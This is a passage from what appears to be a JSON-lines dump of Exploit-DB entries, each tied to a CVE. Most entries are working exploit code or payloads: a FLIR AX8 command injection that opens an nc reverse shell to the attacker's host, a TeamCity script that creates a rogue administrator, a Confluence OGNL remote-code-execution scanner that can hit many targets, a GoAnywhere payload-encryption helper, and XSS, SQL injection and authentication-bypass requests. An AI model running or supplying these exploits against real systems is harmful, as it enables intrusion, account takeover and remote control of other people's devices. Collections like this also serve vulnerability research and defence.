\"http://\"+host+\"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&\"\n urlRelay2On = \"http://\"+host+\"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&\"\n urlRelay2Off = \"http://\"+host+\"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&\"\n\n headers = {\n \"Host\": \"\"+host+\"\",\n \"User-Agent\": \"9lyph/3.0\",\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"DNT\": \"1\",\n \"Connection\": \"close\",\n \"Referer\": \"http://\"+host+\"/relay_cgi.html\",\n \"Cookie\": \"session=4463009\"\n }\n\n print (Fore.YELLOW + f\"[+] Exploiting\" + Style.RESET_ALL, flush=True, end=\" \")\n for i in range(5):\n time.sleep (1)\n print (Fore.YELLOW + \".\" + Style.RESET_ALL, flush=True, end=\"\")\n try:\n if (relay == \"1\"):\n print (Fore.GREEN + \"\\n[+] Relay 1 switched on !\" + Style.RESET_ALL)\n r = requests.get(urlRelay1On)\n time.sleep (5)\n print (Fore.GREEN + \"[+] Relay 1 switched off !\" + Style.RESET_ALL)\n r = requests.get(urlRelay1Off)\n print (Fore.YELLOW + \"PWNED !!!\" + Style.RESET_ALL, flush=True, end=\"\")\n elif (relay == \"2\"):\n print (Fore.GREEN + \"[+] Relay 2 switched on !\" + Style.RESET_ALL)\n r = requests.get(urlRelay2On)\n time.sleep (5)\n print (Fore.GREEN + \"[+] Relay 2 switched on !\" + Style.RESET_ALL)\n r = requests.get(urlRelay2Off)\n print (Fore.YELLOW + \"PWNED !!!\" + Style.RESET_ALL, flush=True, end=\"\")\n else:\n print (Fore.RED + \"[!] No such relay\" + Style.RESET_ALL)\n except KeyboardInterrupt:\n sys.exit(1)\n except requests.exceptions.Timeout:\n print (\"[!] Connection to host timed out !\")\n sys.exit(1)\n except requests.exceptions.Timeout:\n print (\"[!] Connection to host timed out !\")\n sys.exit(1)\n except Exception as e:\n print (Fore.RED + f\"[+] You came up short I\\'m afraid !\" + Style.RESET_ALL)\n\nif __name__ == \"__main__\":\n if len(sys.argv)>2:\n host = sys.argv[1]\n relay = sys.argv[2]\n main ()\n else:\n print (Fore.RED + f\"[+] Not enough arguments, please specify target and relay!\" + Style.RESET_ALL)", "cve_id": "CVE-2022-29593", "source": "exploitdb", "timestamp": "2022-07-29T00:00:00+00:00"} {"id": "3a7d8160d28a78c68078", "text": "FLIR AX8 1.46.16 - Remote Command Injection\n\n# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection\n# Date: 8/19/2022\n# Exploit Author: Samy Younsi Naqwada (https://samy.link), SC\n# Vendor Homepage: https://www.flir.com/\n# Software Link: https://www.flir.com/products/ax8-automation/\n# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok\n# Version: 1.46.16 and under.\n# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)\n# CVE : CVE-2022-37061\n\nfrom __future__ import print_function, unicode_literals\nfrom bs4 import BeautifulSoup\nimport argparse\nimport requests\nimport json\nimport urllib3\n\nurllib3.disable_warnings()\n\ndef banner():\n flirLogo = \"\"\"\n ███████╗██╗ ██╗██████╗\n ██╔════╝██║ ██║██╔══██╗\n █████╗ ██║ ██║██████╔╝\n ██╔══╝ ██║ ██║██╔══██╗\n ██║ ███████╗██║██║ ██║\n ╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝\n .---------------------.\n █████╗ ██╗ ██╗ █████╗ /--'--.------.--------/|\n ██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] ||\n ███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' ||\n ██╔══██║ ██╔██╗ ██╔══██╗ | |( () )| ||\n ██║ ██║██╔╝ ██╗╚█████╔╝ | | `--` | |/\n ╚═╝ ╚═╝╚═╝ ╚═╝ ╚════╝ `-------`------`------`\n \\033[1;92mSamy Younsi (Necrum Security Labs)\\033[1;m\n \\033[1;91mFLIR AX8 Unauthenticated OS Command Injection\\033[1;m\n FOR EDUCATIONAL PURPOSE ONLY.\n \"\"\"\n return print('\\033[1;94m{}\\033[1;m'.format(flirLogo))\n\ndef pingWebInterface(RHOST, RPORT):\n url = 'http://{}:{}/login/'.format(RHOST, RPORT)\n response = requests.get(url, allow_redirects=False, verify=False, timeout=60)\n try:\n if response.status_code != 200:\n print('[!] \\033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\\033[1;m')\n exit()\n soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')\n version = soup.find('p', id='login-title').string\n print('[INFO] {} detected.'.format(version))\n except:\n print('[ERROR] Can\\'t grab the device version...')\n\ndef execReverseShell(RHOST, RPORT, LHOST, LPORT):\n url = 'http://{}:{}/res.php'.format(RHOST, RPORT)\n payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LHOST)\n data = 'action=alarm&id=2;{}'.format(payload)\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n }\n try:\n print('[INFO] Executing reverse shell...')\n response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)\n print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))\n return\n except Exception as e:\n print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)\n return False\n\ndef main():\n banner()\n parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)\n parser.add_argument('--RHOST', help=\"Refers to the IP of the target machine. (FLIR AX8 device)\", type=str, required=True)\n parser.add_argument('--RPORT', help=\"Refers to the open port of the target machine.\", type=int, required=True)\n parser.add_argument('--LHOST', help=\"Refers to the IP of your machine.\", type=str, required=True)\n parser.add_argument('--LPORT', help=\"Refers to the open port of your machine.\", type=int, required=True)\n args = parser.parse_args()\n pingWebInterface(args.RHOST, args.RPORT)\n execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2022-37061", "source": "exploitdb", "timestamp": "2025-04-16T00:00:00+00:00"} {"id": "0c101e9e98665923be51", "text": "Linksys AX3200 V1.1.00 - Command Injection\n\n# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection\n# Date: 2022-09-19\n# Exploit Author: Ahmed Alroky\n# Author: Linksys\n# Version: 1.1.00\n# Authentication Required: YES\n# CVE : CVE-2022-38841\n\n# Tested on: Windows\n\n# Proof Of Concept:\n\n1 - login into AX3200 webui\n2 - go to diagnostics page\n3 - put \"google.com|ls\" to perform a traceroute\n4 - you will get the file list and also you can try \"example.com|id\" to ensure that all commands executed as a root user", "cve_id": "CVE-2022-38841", "source": "exploitdb", "timestamp": "2023-03-22T00:00:00+00:00"} {"id": "25e1f0169ba53919fd01", "text": "MCL-Net 4.3.5.8788 - Information Disclosure\n\n# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure\n# Date: 5/31/2023\n# Exploit Author: Victor A. Morales, GM Sectec Inc.\n# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php\n# Version: 4.3.5.8788 (other versions may be affected)\n# Tested on: Microsoft Windows 10 Pro\n# CVE: CVE-2023-34834\n\nDescription:\nDirectory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the \"/file\" endpoint.\n\nSteps to reproduce:\n1. Navigate to the webserver on default port 5080, where \"Index of Services\" will disclose directories, including the \"/file\" directory.\n2. Browse to the \"/file\" directory and database entry folders configured\n3. The \"AdoInfo.txt\" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.", "cve_id": "CVE-2023-34834", "source": "exploitdb", "timestamp": "2023-06-23T00:00:00+00:00"} {"id": "fca1b3f0caf7d1cd90c7", "text": "PnPSCADA v2.x - Unauthenticated PostgreSQL Injection\n\n# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection\n# Date: 15/5/2023\n# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd\n# Vendor Homepage: https://pnpscada.com/\n# Version: PnPSCADA (cross platforms): v2.x\n# Tested on: Unix\n# CVE : CVE-2023-1934\n# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8\n\nSQLi crashing point:\n\nGET /hitlogcsv.isp?userids=1337'&startdate=\n2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00\nHTTP/1.1\nCache-Control: no-cache\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)\nAppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0\nSafari/534.14\nHost: vulnerablepnpscada.int\nAccept: */*\nAccept-Encoding: gzip, deflate\nConnection: close", "cve_id": "CVE-2023-1934", "source": "exploitdb", "timestamp": "2023-05-23T00:00:00+00:00"} {"id": "ea1639b4089d3244790b", "text": "SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)\n\n# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)\n# Date: 2022-05-15\n# Exploit Author: Ahmed Alroky\n# Author Company : AIactive\n# Version: ver.6.00\n# Vendor home page : https://www.contec.com/\n# Authentication Required: No\n# CVE : CVE-2022-29301\n# Tested on: Windows\n\n# Proof Of Concept:\nhttp://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green", "cve_id": "CVE-2022-29301", "source": "exploitdb", "timestamp": "2022-06-14T00:00:00+00:00"} {"id": "2867c320ceba52dd614f", "text": "SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)\n\n# Exploit Title: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)\n# Date: 2022-05-15\n# Exploit Author: Ahmed Alroky\n# Author Company : AIactive\n# Version: ver.6.00\n# Vendor home page : https://www.contec.com/\n# Authentication Required: No\n# CVE : CVE-2022-29299\n# Tested on: Windows\n\n# Proof Of Concept:\n\nhttp://IP_ADDRESS/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6", "cve_id": "CVE-2022-29299", "source": "exploitdb", "timestamp": "2022-06-14T00:00:00+00:00"} {"id": "daa68986162a0dcd287a", "text": "Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass\n\n# Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass\n# Date: 2022-08-04\n# Exploit Author: Aryan Chehreghani\n# Vendor Homepage: https://www.sophos.com\n# Version: 17.0.10 MR-10\n# Tested on: Windows 11\n# CVE : CVE-2022-1040\n\n# [ VULNERABILITY DETAILS ] :\n\n#This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication.\n\n# [ SAMPLE REQUEST ] :\n\nPOST /webconsole/Controller HTTP/1.1\nHost: 127.0.0.1:4444\nCookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0\nAccept: text/plain, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nOrigin: https://127.0.0.1:4444\nReferer: https://127.0.0.1:4444/webconsole/webpages/login.jsp\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 192\n\nmode=151&json={\"username\"%3a\"admin\",\"password\"%3a\"somethingnotpassword\",\"languageid\"%3a\"1\",\"browser\"%3a\"Chrome_101\",\"accessaction\"%3a1,+\"mode\\u0000ef\"%3a716}&__RequestType=ajax&t=1653896534066\n\n# [ KEY MODE ] : \\u0000eb ,\\u0000fc , \\u0000 ,\\u0000ef ,...\n\n# [ Successful response ] :\n\nHTTP/1.1 200 OK\nDate: Thu, 04 Aug 2022 17:06:39 GMT\nServer: xxxx\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\nContent-Type: text/plain;charset=utf-8\nContent-Length: 53\nSet-Cookie: JSESSIONID=1jy5ygk6w0mfu1mxbv6n30ptal108;Path=/webconsole;Secure;HttpOnly\nConnection: close\n\n{\"redirectionURL\":\"/webpages/index.jsp\",\"status\":200}", "cve_id": "CVE-2022-1040", "source": "exploitdb", "timestamp": "2022-09-02T00:00:00+00:00"} {"id": "de17118872333e095659", "text": "Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)\n\nExploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)\nGoogle Dork: N/A\nDate: 18-06-2023\nExploit Author: Harshit Joshi\nVendor Homepage: https://community.broadcom.com/home\nSoftware Link: https://www.broadcom.com/products/identity/siteminder\nVersion: 12.52\nTested on: Linux, Windows\nCVE: CVE-2023-23956\nSecurity Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221\n\n*Description:*\nI am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have\ndiscovered in the Symantec SiteMinder WebAgent. The vulnerability is\nrelated to the improper handling of user input and has been assigned the\nCommon Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this\nvulnerability is 5.4.\n\nVulnerability Details:\n---------------------\n*Impact:*\n\nThis vulnerability allows an attacker to execute arbitrary JavaScript code\nin the context of the affected application.\n\n*Steps to Reproduce:*\n\n*First:*\n\n1) Visit -\nhttps://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22\n\n2) After visiting the above URL, click on the \"*Change Password*\" button,\nand the popup will appear.\n- The *SMAGENTNAME *parameter is the source of this vulnerability.\n*- Payload Used: **-SM-/\" onfocus=\"alert(1)\" autofocus=\"*\n\n*Second:*\n\n1) Visit -\nhttps://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22\n2) After visiting the above URL, click on the \"*Change Password*\" button,\nand the popup will appear.\n- The *TARGET *parameter is the source of this vulnerability.\n*- Payload Used: **-SM-/\" onfocus=\"alert(1)\" autofocus=\"*", "cve_id": "CVE-2023-23956", "source": "exploitdb", "timestamp": "2023-06-19T00:00:00+00:00"} {"id": "ea8c78cb0d981e555bdc", "text": "Wavlink WN530HG4 - Password Disclosure\n\n# Exploit Title: Wavlink WN530HG4 - Password Disclosure\n# Date: 2022-06-12\n# Exploit Author: Ahmed Alroky\n# Author Company : AIactive\n# Version: M30HG4.V5030.191116\n# Vendor home page : wavlink.com\n# Authentication Required: No\n# CVE : CVE-2022-34047\n# Tested on: Windows\n\n# Exploit\n\nview-source:http://IP_address/set_safety.shtml?r=52300\nsearch for var syspasswd=\"\nyou will find the username and the password", "cve_id": "CVE-2022-34047", "source": "exploitdb", "timestamp": "2022-08-01T00:00:00+00:00"} {"id": "b53b104f26b97e94768d", "text": "Wavlink WN533A8 - Cross-Site Scripting (XSS)\n\n# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)\n# Exploit Author: Ahmed Alroky\n# Author Company : AIactive\n# Version: M33A8.V5030.190716\n# Vendor home page : wavlink.com\n# Authentication Required: No\n# CVE : CVE-2022-34048\n# Tested on: Windows\n\n# Poc code\n\n \n \n \n
\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
\n \n", "cve_id": "CVE-2022-34048", "source": "exploitdb", "timestamp": "2022-08-01T00:00:00+00:00"} {"id": "9f1dcedc61ffc381e6f3", "text": "Wavlink WN533A8 - Password Disclosure\n\n# Exploit Title: Wavlink WN533A8 - Password Disclosure\n# Date: 2022-06-12\n# Exploit Author: Ahmed Alroky\n# Author Company : AIactive\n# Version: M33A8.V5030.190716\n# Vendor home page : wavlink.com\n# Authentication Required: No\n# CVE : CVE-2022-34046\n# Tested on: Windows\n\n# Exploit\n\nview-source:http://IP_ADDRESS/sysinit.shtml\nsearch for var syspasswd=\"\nyou will find the username and the password", "cve_id": "CVE-2022-34046", "source": "exploitdb", "timestamp": "2022-08-01T00:00:00+00:00"} {"id": "d15c3f0a71f74ac26c4a", "text": "GitLab CE/EE < 16.7.2 - Password Reset\n\n# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset\n# Exploit Author: Sebastian Kriesten (0xB455)\n# Twitter: https://twitter.com/0xB455\n\n# Date: 2024-01-12\n# Vendor Homepage: gitlab.com\n# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/\n# Version: <16.7.2, <16.6.4, <16.5.6\n# CVE: CVE-2023-7028\n\nProof of Concept:\nuser[email][]=valid@email.com&user[email][]=attacker@email.com", "cve_id": "CVE-2023-7028", "source": "exploitdb", "timestamp": "2024-03-14T00:00:00+00:00"} {"id": "6ea3463b4b2e883a08be", "text": "JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)\n\n#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)\n#- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648\n#- Exploit Author: ByteHunter\n#- Vendor: JetBrains\n#- Email: 0xByteHunter@proton.me\n#- vendor: JetBrains\n#- Version: versions before 2023.05.4\n#- Tested on: 2023.05.3\n#- CVE : CVE-2023-42793\n\nimport requests\nimport argparse\nimport re\nimport random\nimport string\nimport subprocess\n\n\nbanner = \"\"\"\n=====================================================\n* CVE-2023-42793 *\n* TeamCity Admin Account Creation *\n* *\n* Author: ByteHunter *\n=====================================================\n\"\"\"\n\nprint(banner)\nparser = argparse.ArgumentParser(description=\"CVE-2023-42793 - TeamCity JetBrains PoC\")\nparser.add_argument(\"-u\", \"--url\", required=True, help=\"Target URL\")\nparser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"verbose mode\")\nargs = parser.parse_args()\n\nurl = args.url\n\nif url.startswith(\"https://\"):\n curl_command = \"curl -k\"\nelse:\n curl_command = \"curl\"\n\nget_token_url = f\"{url}/app/rest/users/id:1/tokens/RPC2\"\ndelete_token_url = f\"{url}/app/rest/users/id:1/tokens/RPC2\"\ncreate_user_url = f\"{url}/app/rest/users\"\n\ncreate_user_command = \"\"\ntoken = \"\"\n\nresponse = requests.post(get_token_url, verify=False)\nif response.status_code == 200:\n match = re.search(r'value=\"([^\"]+)\"', response.text)\n if match:\n token = match.group(1)\n print(f\"Token: {token}\")\n else:\n print(\"Token not found in the response\")\n\nelif response.status_code == 404:\n print(\"Token already exists\")\n delete_command = f'{curl_command} -X DELETE {delete_token_url}'\n delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n delete_process.wait()\n delete_output = delete_process.communicate()\n if delete_process.returncode == 0:\n print(\"Previous token deleted successfully\\nrun this command again for creating new token & admin user.\")\n else:\n print(\"Failed to delete the previous token\")\nelif response.status_code == 400:\n print(\"Token already exists\")\n delete_command = f'{curl_command} -X DELETE {delete_token_url}'\n delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n delete_process.wait()\n delete_output = delete_process.communicate()\n if delete_process.returncode == 0:\n print(\"Previous token deleted successfully\\nrun this command again for creating new token & admin user.\")\n else:\n print(\"Failed to delete the previous token\")\nelse:\n print(\"Failed to get a token\")\n\nif token:\n headers = {\n \"Authorization\": f\"Bearer {token}\",\n \"Content-Type\": \"application/json\"\n }\n random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4))\n username = f\"city_admin{random_chars}\"\n data = {\n \"username\": username,\n \"password\": \"Main_password!!**\",\n \"email\": \"angry-admin@funnybunny.org\",\n \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}\n }\n create_user_command = f'{curl_command} --path-as-is -H \"Authorization: Bearer {token}\" -X POST {create_user_url} -H \"Content-Type: application/json\" --data \\'{{\"username\": \"{username}\", \"password\": \"theSecretPass!\", \"email\": \"nest@nest\", \"roles\": {{\"role\": [{{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}}]}}}}\\''\n create_user_response = requests.post(create_user_url, headers=headers, json=data)\n if create_user_response.status_code == 200:\n print(\"Successfully exploited!\")\n print(f\"URL: {url}\")\n print(f\"Username: {username}\")\n print(\"Password: Main_password!!**\")\n else:\n print(\"Failed to create new admin user\")\n\nif args.verbose:\n if response.status_code == 400:\n pass\n else:\n print(f\"Final curl command: {create_user_command}\")", "cve_id": "CVE-2023-42793", "source": "exploitdb", "timestamp": "2024-03-14T00:00:00+00:00"} {"id": "ab796bfd7ca582344891", "text": "Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\n# Google Dork: N/A\n# Date: 06/006/2022\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\n#!/usr/bin/python3\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n\n\ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n\ndef main():\n banner()\n\n globals().update(locals())\n\n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()", "cve_id": "CVE-2022-26134", "source": "exploitdb", "timestamp": "2022-06-10T00:00:00+00:00"} {"id": "51ba725850046bce92a5", "text": "ERPNext 12.29 - Cross-Site Scripting (XSS)\n\n# Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS)\n# Date: 7 Feb 2023\n# Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla\n#Github - https://github.com/patrickdeanramos/CVE-2022-28598\n# Vendor Homepage: https://erpnext.com/\n# Version: 12.29\n# CVE-2022-28598\n\nSummary: Stored cross-site scripting (XSS) vulnerability was found in ERPNext 12.29 where the\n\"last_known_version\" field found in the \"My Setting\" page in ERPNext\n12.29.0 allows remote attackers to inject arbitrary web script or HTML via\na crafted site name by doing an authenticated POST HTTP request to\n'/desk#Form/User/(Authenticated User)' and inject the script in the\n'last_known_version' field where we are able to view the script by\nclicking the 'pdf' view form.\n\nThis vulnerability is specifically the \"last_known_version\" field found\nunder the 'My Settings' where we need to first save the my settings.\n\n1. Login as any user\n2. Under the ‘last_known_version’ field we are going to inject our\nmalicious script.\n3. To view our injected script we need to click the view pdf page, and as\nseen below we have successfully injected our script.", "cve_id": "CVE-2022-28598", "source": "exploitdb", "timestamp": "2023-04-05T00:00:00+00:00"} {"id": "f6dd5b89418b4ed40aa6", "text": "Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)\n\n// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)\n// Google Dork: title:\"GoAnywhere\"\n// Date: 3/26/2023\n// Exploit Author: Youssef Muhammad\n// Vendor Homepage: https://www.goanywhere.com/\n// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0\n// Version: > 7.1.1 for windows / > 7.0.3 for Linux\n// Tested on: Windows, Linux\n// CVE : CVE-2023-0669\n// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution\n\nimport java.util.Base64;\nimport javax.crypto.Cipher;\nimport java.nio.charset.StandardCharsets;\nimport javax.crypto.SecretKeyFactory;\nimport javax.crypto.spec.PBEKeySpec;\nimport javax.crypto.spec.IvParameterSpec;\nimport javax.crypto.spec.SecretKeySpec;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\npublic class CVE_2023_0669_helper {\n static String ALGORITHM = \"AES/CBC/PKCS5Padding\";\n static byte[] KEY = new byte[30];\n static byte[] IV = \"AES/CBC/PKCS5Pad\".getBytes(StandardCharsets.UTF_8);\n public static void main(String[] args) throws Exception {\n if (args.length != 2) {\n System.out.println(\"Usage: java CVE_2023_0669_helper \");\n System.exit(1);\n }\n String filePath = args[0];\n String version = args[1];\n byte[] fileContent = Files.readAllBytes(Paths.get(filePath));\n String encryptedContent = encrypt(fileContent, version);\n System.out.println(encryptedContent);\n }\n public static String encrypt(byte[] data, String version) throws Exception {\n Cipher cipher = Cipher.getInstance(ALGORITHM);\n KEY = (version.equals(\"2\")) ? getInitializationValueV2() : getInitializationValue();\n SecretKeySpec keySpec = new SecretKeySpec(KEY, \"AES\");\n IvParameterSpec ivSpec = new IvParameterSpec(IV);\n cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);\n byte[] encryptedObject = cipher.doFinal(data);\n String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);\n String v = (version.equals(\"2\")) ? \"$2\" : \"\";\n bundle += v;\n return bundle;\n }\n private static byte[] getInitializationValue() throws Exception {\n // Version 1 Encryption\n String param1 = \"go@nywhereLicenseP@$$wrd\";\n byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};\n return SecretKeyFactory.getInstance(\"PBKDF2WithHmacSHA1\").generateSecret(new PBEKeySpec(new String(param1.getBytes(), \"UTF-8\").toCharArray(), param2, 9535, 256)).getEncoded();\n }\n private static byte[] getInitializationValueV2() throws Exception {\n // Version 2 Encryption\n String param1 = \"pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R\";\n byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};\n return SecretKeyFactory.getInstance(\"PBKDF2WithHmacSHA1\").generateSecret(new PBEKeySpec(new String(param1.getBytes(), \"UTF-8\").toCharArray(), param2, 3392, 256)).getEncoded();\n }\n}", "cve_id": "CVE-2023-0669", "source": "exploitdb", "timestamp": "2023-04-08T00:00:00+00:00"} {"id": "fbd289358c114563622b", "text": "Spring Cloud 3.2.2 - Remote Command Execution (RCE)\n\n# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)\n# Date: 07/07/2023\n# Exploit Author: GatoGamer1155, 0bfxgh0st\n# Vendor Homepage: https://spring.io/projects/spring-cloud-function/\n# Description: Exploit to execute commands exploiting CVE-2022-22963\n# Software Link: https://spring.io/projects/spring-cloud-function\n# CVE: CVE-2022-22963\n\nimport requests, argparse, json\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--url\", type=str, help=\"http://172.17.0.2:8080/functionRouter\", 